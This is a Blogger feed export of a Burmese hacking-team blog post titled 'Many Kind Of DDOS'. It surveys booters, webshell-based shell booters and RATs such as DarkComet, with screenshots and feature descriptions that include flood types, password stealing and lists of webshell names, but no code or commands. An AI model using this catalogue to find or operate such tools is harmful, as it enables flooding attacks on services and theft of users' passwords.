ေအာက္မွာ ၾကည့္ၾကပါ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYgg5rVHgi5do7lTl4hpjlDW9vvniEzvwAtnBE28onjF25iJ-pLaN2AQKuh8Fw0cFLFirU0MEPh5TkaxJ9g1zDLcJFmJWjUOu6VQVQtPhBgWKgbppB01ksOCdJecmw3CNzN_AWjqFTH-w/s1600/PwYxD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYgg5rVHgi5do7lTl4hpjlDW9vvniEzvwAtnBE28onjF25iJ-pLaN2AQKuh8Fw0cFLFirU0MEPh5TkaxJ9g1zDLcJFmJWjUOu6VQVQtPhBgWKgbppB01ksOCdJecmw3CNzN_AWjqFTH-w/s1600/PwYxD.png" /></a></div>
<br />
<br />
ဒီေလာက္ဆုိ... သေဘာေပါက္ေလာက္ပါတယ္... ေနာ္...<br />
အားနည္းခ်က္.... Human Image Verification ... ရိွေနရင္...မရပါ....<br />
ပံုမ်ားမျမင္ရလွ်င္ကလစ္လုပ္ပါ <br />
<br />
copy from mhu<br />
Thank to <span class="author vcard" itemprop="creator name"><span itemprop="name"><span style="color: #b05f3c;">D3vilM4yCry</span></span></span><br />
<br />
<br />shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-41371504379743883292012-08-26T06:30:00.002-07:002012-08-26T06:30:57.374-07:00Many Kind Of DDOS<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZXlmMpDpe08cDTdtsgquDB3RRl-96GnCjQBjzxO953MgIDM3e-Zc50bf5gELsPbI_XT-P1XnF72rsIeRJW6yDeWgoH74HYYFnjZMqPlk9OCYcr6_L4u0oBYptrcVmP3cFxzHm0LG56LE/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZXlmMpDpe08cDTdtsgquDB3RRl-96GnCjQBjzxO953MgIDM3e-Zc50bf5gELsPbI_XT-P1XnF72rsIeRJW6yDeWgoH74HYYFnjZMqPlk9OCYcr6_L4u0oBYptrcVmP3cFxzHm0LG56LE/s1600/index.jpg" /></a></div>
<h2>
<span id="goog_1032495767"></span><span id="goog_1032495768"></span></h2>
<h2>
</h2>
<h2>
Fg Power DDOSER</h2>
This tool is primarily a “hostbooter” and is aimed at giving
unscrupulous gamers an advantage by flooding opponents with traffic.
HTTP flooding capabilities may be effective at bringing down unprotected
websites as well. A Firefox password stealer is also included, which
can be very deadly as people re-use passwords all the time.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjndiwdQ06EMRJpPVs7e5NDzcsuHmDgJD1V0F8AIuJXTEFJuKBuZ4NJh-ZcvB1nV0u8HjY8TFpic9z7oXUGkxX9HSnbd5xcKdsR7XZMn6CxUgX2SPJBwfkd9nbvSO4grSF2mg5rKDq2VH-E/s1600/ddos+1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjndiwdQ06EMRJpPVs7e5NDzcsuHmDgJD1V0F8AIuJXTEFJuKBuZ4NJh-ZcvB1nV0u8HjY8TFpic9z7oXUGkxX9HSnbd5xcKdsR7XZMn6CxUgX2SPJBwfkd9nbvSO4grSF2mg5rKDq2VH-E/s320/ddos+1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE-oD0rWGz0eSz_EFBVmXBcWWJQhdsu-6DnwRK0qT6iaf8aQnS4yWtd4nhB6y9g_2IcY8tnjWhHsDhFS5HVUnjmhyz53lUbiMKLVfUPYpFfFBsKtPYh76ogdTGdTKEfHcZIcgJRT2faCeG/s1600/ddos+2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE-oD0rWGz0eSz_EFBVmXBcWWJQhdsu-6DnwRK0qT6iaf8aQnS4yWtd4nhB6y9g_2IcY8tnjWhHsDhFS5HVUnjmhyz53lUbiMKLVfUPYpFfFBsKtPYh76ogdTGdTKEfHcZIcgJRT2faCeG/s320/ddos+2.png" width="320" /></a></div>
<h2>
GB DDoSeR v3</h2>
This tool is advertised as a booter and delivers a TCP or UDP stream
of characters of the attacker’s choice towards a victim IP/host and
port. This simple bot is written in Visual Basic.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhf9lej2rHPPyGwjuFz4VOBBuA2xeF6bVg1T_IvcZzSgIbbY-2i862IP1cbYKaAnRIXwdFJ865BkJFy5ijaLxFHFXYI8Yko_wTYkg_sLyWN-pH9VUibq3rtKvhkjfImkhvfJPcXhRZAS6Cd/s1600/ddos3.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhf9lej2rHPPyGwjuFz4VOBBuA2xeF6bVg1T_IvcZzSgIbbY-2i862IP1cbYKaAnRIXwdFJ865BkJFy5ijaLxFHFXYI8Yko_wTYkg_sLyWN-pH9VUibq3rtKvhkjfImkhvfJPcXhRZAS6Cd/s320/ddos3.jpg" width="320" /></a></div>
<h2>
Silent-DDoSer</h2>
This Visual Basic tool offers attack types “UDP”, “SYN” and “HTTP”.
All appear to send a basic user-specified flood string. Silent-DDoSer
utilizes triple-DES and RC4 encryption, IPv6 capabilities, and password
stealing functions.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmNQZoZq_DtNjE3jxQk2pW249J0bTMnXzh9ISQVX3s7IPgWLguoojaVBong56uQdPA5OF3D4xU1Yf43sktyvXcRSlrXvEpN1IoCys2egMuFRx5ktv7AQWvJRvgHWCMhMPw3pXwSjuR4NOd/s1600/ddos4.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmNQZoZq_DtNjE3jxQk2pW249J0bTMnXzh9ISQVX3s7IPgWLguoojaVBong56uQdPA5OF3D4xU1Yf43sktyvXcRSlrXvEpN1IoCys2egMuFRx5ktv7AQWvJRvgHWCMhMPw3pXwSjuR4NOd/s320/ddos4.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyEi6xNePh-kNoggib18St_ULBoXUxPC9LArBxYiqTBHu_EoRAq7IAM2LyYud-OfzTfVMemVGhkyGyGIegPUsyHqqySjudoyFFXgr4JxNJSCqoZ9Rs_iZ6lJRFw08W_tUYckK8M48u4S77/s1600/ddos5.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyEi6xNePh-kNoggib18St_ULBoXUxPC9LArBxYiqTBHu_EoRAq7IAM2LyYud-OfzTfVMemVGhkyGyGIegPUsyHqqySjudoyFFXgr4JxNJSCqoZ9Rs_iZ6lJRFw08W_tUYckK8M48u4S77/s320/ddos5.jpg" width="320" /></a></div>
<h2>
Drop-Dead DDoS</h2>
This tool is one example of a Runescaper booter. While I am not a
gamer, the opportunity to make real-world money through the virtual
economies of gaming worlds may have help make such tools popular.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0iXXsoJbNmOqGiHg7paIZbCRSguMCg5AMU2QuwjF5CXtZ0VnPfjs2WiRFIkFSy6w7Y9qPPi0qQOJBZ0pWMzsWsP-chFcpuu2uZoEHqDuKajLiMKpeInRxrI33yTvALhqRyDQT_6fZ8ltO/s1600/ddos6.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0iXXsoJbNmOqGiHg7paIZbCRSguMCg5AMU2QuwjF5CXtZ0VnPfjs2WiRFIkFSy6w7Y9qPPi0qQOJBZ0pWMzsWsP-chFcpuu2uZoEHqDuKajLiMKpeInRxrI33yTvALhqRyDQT_6fZ8ltO/s320/ddos6.jpg" width="320" /></a></div>
<h2>
D.NET DDoSeR</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlz_an19Mqjh7_70tLtezTg4IfzO2ubOB6-LRN4Y9uutE7vxGhmamCFgmfcA4iWbbWTI2_YY5Js6_Hile5-Euwa7RBiLepS0DGDY2_cXqxzXMDQX5HxzW-7e-VtKQhrildpJttZmwxsKHX/s1600/ddos+7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlz_an19Mqjh7_70tLtezTg4IfzO2ubOB6-LRN4Y9uutE7vxGhmamCFgmfcA4iWbbWTI2_YY5Js6_Hile5-Euwa7RBiLepS0DGDY2_cXqxzXMDQX5HxzW-7e-VtKQhrildpJttZmwxsKHX/s320/ddos+7.png" width="320" /></a></div>
<h2>
Positve’s xDDoSeR</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-VelJZnIz6DsQl3KmjlSQ9MfwwLhmG9W_-iXYGoLU3CS8L_gzE52xEnKN0B9EAVrzAzabHxCSqQBwGNa7-I2zn3EuNb9A5PhvPnjLStAemRNAd4FtYvq47iTLLgH4pO5_DlrBpN4n43In/s1600/ddos8.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-VelJZnIz6DsQl3KmjlSQ9MfwwLhmG9W_-iXYGoLU3CS8L_gzE52xEnKN0B9EAVrzAzabHxCSqQBwGNa7-I2zn3EuNb9A5PhvPnjLStAemRNAd4FtYvq47iTLLgH4pO5_DlrBpN4n43In/s320/ddos8.jpg" width="320" /></a></div>
<h2>
Sniff DDoSer</h2>
This one was announced on a forum and appears to be written in .NET.
The default operation appears targeted towards Xbox flooding. We can
also see some of the typical anti-detection mechanisms at play in the
builder screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQapM2rKD3WlI-rv5dAl16f8MNAmOEWK1U8KwP4y-A0k9XtokFtm3WA-LonD2whqWtOs57UXh3EfspaYw1e_G406_4J7BNQhsqWC2U6Op-MAUyysw8P4oUk3EyO9pJh5DUNW3P5oZ04nNK/s1600/ddos10.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQapM2rKD3WlI-rv5dAl16f8MNAmOEWK1U8KwP4y-A0k9XtokFtm3WA-LonD2whqWtOs57UXh3EfspaYw1e_G406_4J7BNQhsqWC2U6Op-MAUyysw8P4oUk3EyO9pJh5DUNW3P5oZ04nNK/s320/ddos10.jpg" width="293" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0zoO_yDcWdt_BhrTXLXMuwXT5m84nb7zorno6yUcUfGZBwHSEMDYrczp4wm-x0yP16IA1AnvLep2GgiNCXy4IEA3L8TH8LBjeV8mKFpR22vjrkIrbw9SVNqnfA2Jnf561PL2gW76O-MMv/s1600/ddos9.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0zoO_yDcWdt_BhrTXLXMuwXT5m84nb7zorno6yUcUfGZBwHSEMDYrczp4wm-x0yP16IA1AnvLep2GgiNCXy4IEA3L8TH8LBjeV8mKFpR22vjrkIrbw9SVNqnfA2Jnf561PL2gW76O-MMv/s320/ddos9.jpg" width="320" /></a></div>
<h2>
Darth DDoSeR v2</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-oQbKQZwza9ZL9ZlLft3eLP4qHYNN2PlAAyhNIQUViAJ36fQpQLWQ2wv36U7vHFkWTKXb6rOcB9Uar_7Mny41KHM3y8EPIj0mdSJGMbks1UaTtK3Eh2lfJKuD97_8t3tzPhl5Ae4WNS3n/s1600/ddos11.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-oQbKQZwza9ZL9ZlLft3eLP4qHYNN2PlAAyhNIQUViAJ36fQpQLWQ2wv36U7vHFkWTKXb6rOcB9Uar_7Mny41KHM3y8EPIj0mdSJGMbks1UaTtK3Eh2lfJKuD97_8t3tzPhl5Ae4WNS3n/s320/ddos11.jpg" width="320" /></a></div>
<h2>
Net-Weave</h2>
Net-Weave is one of the many bots that appeared in our malware
collection in mid-2011. It is a booter/bot and backdoor written in .NET
and features the typical array of malware functionality including
download and execute, USB spreading capabilities, TCP connection
exhaustion flood, UDP flood, and a crude port 80 flood instantiated with
a .NET Socket call.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRbM4p7MdisrfQxJ99axMEITMz2fucOoOpfrhYsUn9GmGx2GUyHaOhZXVineugOYMwzmDl-eZggsN5VEGbVzxYDSuKz07Af6z__Mybwz270nXM3RYWBTsgZFjnAVjxiZaaiSNGqIPA868H/s1600/ddos12.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRbM4p7MdisrfQxJ99axMEITMz2fucOoOpfrhYsUn9GmGx2GUyHaOhZXVineugOYMwzmDl-eZggsN5VEGbVzxYDSuKz07Af6z__Mybwz270nXM3RYWBTsgZFjnAVjxiZaaiSNGqIPA868H/s320/ddos12.jpg" width="224" /></a></div>
<h2>
Malevolent DDoSeR</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcNmeCt8K3SL89AdwOjvTXVIiBqWdOVcnEXXfgWTBvyVb5INIkAbCNKlR8DDK1fOLN6gYwyF8jzeDCNw2RrChTtCU2LIUjn9OygvIDLgKOOC0EBaxISjVHuXgKF_vFPSo_lVWtBPt1ighC/s1600/ddos13.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcNmeCt8K3SL89AdwOjvTXVIiBqWdOVcnEXXfgWTBvyVb5INIkAbCNKlR8DDK1fOLN6gYwyF8jzeDCNw2RrChTtCU2LIUjn9OygvIDLgKOOC0EBaxISjVHuXgKF_vFPSo_lVWtBPt1ighC/s320/ddos13.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA6ijkjOojng6LQK9TI1Bv1JUa8K9o5CjcPXXlEGWk8XLntjVi6zJx3immaCEsPPOv9CGHoR_dDKtMh8S6kVHU3HlkMdb5ff9ARw_yOjfYyf5qrJ2PPesTjJloyH8T0giTPHbUwUcpf0SU/s1600/ddos14.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA6ijkjOojng6LQK9TI1Bv1JUa8K9o5CjcPXXlEGWk8XLntjVi6zJx3immaCEsPPOv9CGHoR_dDKtMh8S6kVHU3HlkMdb5ff9ARw_yOjfYyf5qrJ2PPesTjJloyH8T0giTPHbUwUcpf0SU/s320/ddos14.jpg" width="320" /></a></div>
<h2 style="text-align: center;">
</h2>
<h2>
HypoCrite</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgWzpgP6Z8FL-WCye3fi3wLU2aJgUw0Ud8JR_8pVwqrRpeekIQIsIsmQ9Ho0_KSka3YA6HMbr6RqA8w2JmYYwHq9aHR2R941jzUjMDsXwVF75hqBc45wNK4pKzrZAHzKwdMBX9KfIuxHzQ/s1600/ddos15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgWzpgP6Z8FL-WCye3fi3wLU2aJgUw0Ud8JR_8pVwqrRpeekIQIsIsmQ9Ho0_KSka3YA6HMbr6RqA8w2JmYYwHq9aHR2R941jzUjMDsXwVF75hqBc45wNK4pKzrZAHzKwdMBX9KfIuxHzQ/s320/ddos15.png" width="320" /></a></div>
<h2>
Host Booter v5.7</h2>
This booter features several flooding attacks including the popular Slowloris attack style. The features are listed as:<br />
UDP (UDP flood), Port (Blocks connections on that port), HTTP (For websites), Slowloris (For websites),<br />
Bandwidth Drain (Put a direct link for a .exe or any other file),
Send Command To All / Send Stop To All (Execute or End your command),
Ports: 25 / 80 / 445 / 3074 / 27015 (Ports you can choose from, you can
use your own), Sockets: [1-250] (How many sockets you will use),
Seconds: [1-60] (How many seconds you wish your attack to be enabled
for), Minutes: [1-59] (How many minutes you wish your attack to be
enabled for), Size (KB) Packet size for UDP, Delay (MS) Time between
sending a packet<br />
Connect (MS) Reconnect sockets, Timeout (MS) Connection timeout<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiezkL-IBJyWQ1_U2rm5QJDARuPtTBmWIUc3XzntqwSC2clbahlQCUrZcE-npb5J3o07HBpZXXC-Q1CcQ_rZHyRTSwTghuakobwso4Ae2H2a3RGbOdDR5ysUlvs2UQuNyI4hyGWgoG2C9nh/s1600/ddos16.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiezkL-IBJyWQ1_U2rm5QJDARuPtTBmWIUc3XzntqwSC2clbahlQCUrZcE-npb5J3o07HBpZXXC-Q1CcQ_rZHyRTSwTghuakobwso4Ae2H2a3RGbOdDR5ysUlvs2UQuNyI4hyGWgoG2C9nh/s320/ddos16.jpg" width="320" /></a></div>
<h2>
Manta d0s v1.0</h2>
The author of this tool, Puridee, has also written multiple other tools including the “Good-Bye” DoS tool.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujKSHXt4T7ihYxFkbF0qFhrYYsdvQi_uCM1KlxAfkvZjEdUVbt_i_KpsNuwPMNOulGuEvDMC9XPRq2d21hEFTr-__99ut7zdxFa2FRZcrmFsm-r6YMuc_g1CeO4hIe_qmCHIFNE-Jf0by/s1600/ddos17.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgujKSHXt4T7ihYxFkbF0qFhrYYsdvQi_uCM1KlxAfkvZjEdUVbt_i_KpsNuwPMNOulGuEvDMC9XPRq2d21hEFTr-__99ut7zdxFa2FRZcrmFsm-r6YMuc_g1CeO4hIe_qmCHIFNE-Jf0by/s320/ddos17.jpg" width="320" /></a></div>
<h2>
Good Bye v3.0</h2>
The Good-Bye tools appear to be simple HTTP flooding tools that have no DDoS or botnet capability.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_YteDDe4BO7d2-DYPIy-awR8NRe29irjjlYoQL3_vtA1jkmIPhTMH9plW-iZF51-5rRD2JjIpm0VXmcqz3OSjXzBvVRShk0gOW4fPH6nMJCBeIKz0ScaSLL6jeT7KBihDXSbBla4JH5-/s1600/ddos18.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii_YteDDe4BO7d2-DYPIy-awR8NRe29irjjlYoQL3_vtA1jkmIPhTMH9plW-iZF51-5rRD2JjIpm0VXmcqz3OSjXzBvVRShk0gOW4fPH6nMJCBeIKz0ScaSLL6jeT7KBihDXSbBla4JH5-/s320/ddos18.jpg" width="320" /></a></div>
<h2>
Good Bye v5.0</h2>
<h2>
</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTnTkQX8u8LfGJu7W730qqagFWILpYZXhBoLZIolTu_KC1u0AwvrJMrWVFkDIh88fAlPL7AFsb0m7aUK-bB-22oSkugKJ-BVpN1jSeARsrxX-9nU47m9bqfoKSxtf5hNwMLymakyPzg8xK/s1600/ddos19.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTnTkQX8u8LfGJu7W730qqagFWILpYZXhBoLZIolTu_KC1u0AwvrJMrWVFkDIh88fAlPL7AFsb0m7aUK-bB-22oSkugKJ-BVpN1jSeARsrxX-9nU47m9bqfoKSxtf5hNwMLymakyPzg8xK/s320/ddos19.png" width="320" /></a></div>
<h2 style="text-align: center;">
</h2>
<h2>
Black Peace Group DDoser</h2>
Little additional information was found about this particular tool.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgolh0HhlAtKgKbGplG4mtTkUiEgfokeCIkF2XVbKCOy-BUgY5HaOVvIIFIJsppF9aNE0Pl8lcyuVmSYCjWbmkPXpJZAnRvcgxp3DMY50VXRCG0tixGrA1ec86-AlBXZUu3t2_d7lXvaE-E/s1600/ddos20.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgolh0HhlAtKgKbGplG4mtTkUiEgfokeCIkF2XVbKCOy-BUgY5HaOVvIIFIJsppF9aNE0Pl8lcyuVmSYCjWbmkPXpJZAnRvcgxp3DMY50VXRCG0tixGrA1ec86-AlBXZUu3t2_d7lXvaE-E/s320/ddos20.jpg" width="320" /></a></div>
Now we’ll look at a couple of “shell booters” that utilize hijacked web
applications to perform flooding attacks. While these have been well
documented in the past, shell booters typically leverage a number of
compromised web applications where an attacker has typically installed a
PHP webshell. Sometimes, these webshells may exist on high bandwidth
networks, which can amplify the force of the attack significantly.
Private webshells are worth more, and lists of webshells can be
purchased. Some generic webshells are x32, greenshell, PsYChOTiiC,
shell, mouss, Supershell, venom, atomic, and many others. There are
other shells specifically created for ddos, such as ddos.php. A webshell
can of course be named anything, but these names are common.<br />
<br />
<h2>
PHPDoS</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd_uLM9s22sVelh7afCnttszWqa5EBukowqbDK5rC-dfUOYnzplKuMrCBulVoxberpl-fX_Z-5fnGTFP0sBwt4UY86FKs7SGwoiELP83R6LBYZ78JmeoTaotcnhsf6-EuUjbbqiKu2YGiC/s1600/ddos21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd_uLM9s22sVelh7afCnttszWqa5EBukowqbDK5rC-dfUOYnzplKuMrCBulVoxberpl-fX_Z-5fnGTFP0sBwt4UY86FKs7SGwoiELP83R6LBYZ78JmeoTaotcnhsf6-EuUjbbqiKu2YGiC/s320/ddos21.png" width="320" /></a></div>
<h2>
TWBOOTER</h2>
<h2>
</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio-dgYiEG7wGC6Qd3HNKaLL8YBfIPVgrIGSZGeGWkgOYe3Cuke0-3o-GRBXUeEpKUiODzopOo3gCneC7Z9A5rSE1gCTqOTFZbLAlPa6NykGklUcXEYc73bLt3Jg0CxuV96neCDkI387-b7/s1600/ddos23.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="293" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio-dgYiEG7wGC6Qd3HNKaLL8YBfIPVgrIGSZGeGWkgOYe3Cuke0-3o-GRBXUeEpKUiODzopOo3gCneC7Z9A5rSE1gCTqOTFZbLAlPa6NykGklUcXEYc73bLt3Jg0CxuV96neCDkI387-b7/s320/ddos23.png" width="320" /></a></div>
<h2>
Gray Pigeon RAT</h2>
This is a screenshot from the Gray Pigeon Remote Access Trojan (RAT).
In this screenshot, the attacker appears to have three bots online but
has filtered the list to show only bots from Beijing, China. Gray Pigeon
is well known for its RAT capabilities but it also has DDoS features as
well. There are many DDoS bots using Chinese language sets and
operating from within the Chinese IP address space. Some of these have
been profiled by Jeff Edwards of Arbor Networks ASERT in the past. A
great deal of code sharing takes place among the Chinese DDoS bot
families that we have analyzed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjSSgsNeGPKNcqOdRKhvTLNm4dl6MXZvJ0RUJGm2QBpJ62V5stegovFJGVck2tU9gQ-JQqTNDQ61jDHJxfhhPCCCjQ98U4P4l07T7mzSdq6W98jz6GQjS4L6WSqcHDNTrLi1EnWD45B73L/s1600/ddos24.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjSSgsNeGPKNcqOdRKhvTLNm4dl6MXZvJ0RUJGm2QBpJ62V5stegovFJGVck2tU9gQ-JQqTNDQ61jDHJxfhhPCCCjQ98U4P4l07T7mzSdq6W98jz6GQjS4L6WSqcHDNTrLi1EnWD45B73L/s320/ddos24.jpg" width="320" /></a></div>
<h2>
DarkComet RAT aka Fynloski</h2>
DarkComet is freeware and easily available to anyone. While it
features a variety of flooding types, these are an afterthought compared
to its main Remote Access Trojan functions which are significant. The
binaries for this threat are often called Fynloski.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM2X9kugP_TzM7j0zrKJ6L0trV3MopvatlLT0QJMddTc_4uY1GcQ22RoYVFaCeZbA4zqKW4CSesPKMKn3VJJGulTi_yfARzt5Qw7_s6AjHhzcyhyKkfJgk00YcU9xUy2HKaT6_Wv7SdmgJ/s1600/ddos25.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM2X9kugP_TzM7j0zrKJ6L0trV3MopvatlLT0QJMddTc_4uY1GcQ22RoYVFaCeZbA4zqKW4CSesPKMKn3VJJGulTi_yfARzt5Qw7_s6AjHhzcyhyKkfJgk00YcU9xUy2HKaT6_Wv7SdmgJ/s320/ddos25.jpg" width="320" /></a></div>
<br />
<div style="text-align: center;">
</div>
<br />
<h2>
MP-DDoser v 1.3</h2>
<h2>
</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC689Je5m2-sSgY7ox5Fa0gOnWLiCKyIxkJ03p8r5mzwcHXdnVI-lhVQ5-DdjLT42ljV9LMWo2MMSOFvVh5OmQb4EpwCm1rNBGVMgC_R8oGaY3RzqbNP0KGCzE221YAspIps4Bq08uhvIR/s1600/ddos28.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC689Je5m2-sSgY7ox5Fa0gOnWLiCKyIxkJ03p8r5mzwcHXdnVI-lhVQ5-DdjLT42ljV9LMWo2MMSOFvVh5OmQb4EpwCm1rNBGVMgC_R8oGaY3RzqbNP0KGCzE221YAspIps4Bq08uhvIR/s320/ddos28.png" width="320" /></a></div>
<h2>
Warbot</h2>
This is the warbot web based control panel. Commands are ddos.http (seen here), ddos.tcp and ddos.udp.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlYrcTBzPWinjYGdIQ6EWQKHfV4_qL5PuAnXff7iiyaStjwe0doL1Amn69uTGIAa4vijvAzT19ob1bscZMoo1Mn-UxbsJoJfQK8nAbKROQkiS03bQDFS7tkxjmw2NSMzmx_ZF0VLTtxV7u/s1600/ddos+28.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlYrcTBzPWinjYGdIQ6EWQKHfV4_qL5PuAnXff7iiyaStjwe0doL1Amn69uTGIAa4vijvAzT19ob1bscZMoo1Mn-UxbsJoJfQK8nAbKROQkiS03bQDFS7tkxjmw2NSMzmx_ZF0VLTtxV7u/s320/ddos+28.png" width="320" /></a></div>
<div style="text-align: center;">
</div>
<br />
<div style="text-align: center;">
</div>
<div style="text-align: center;">
<span style="font-size: medium;"><span style="color: red;">mmcybersecurityteam မွကို Funny_Z0mb!3 စုေဆာင္းတင္ျပေပးျခင္းျဖစ္ပါသည္။</span></span></div>
<div style="text-align: center;">
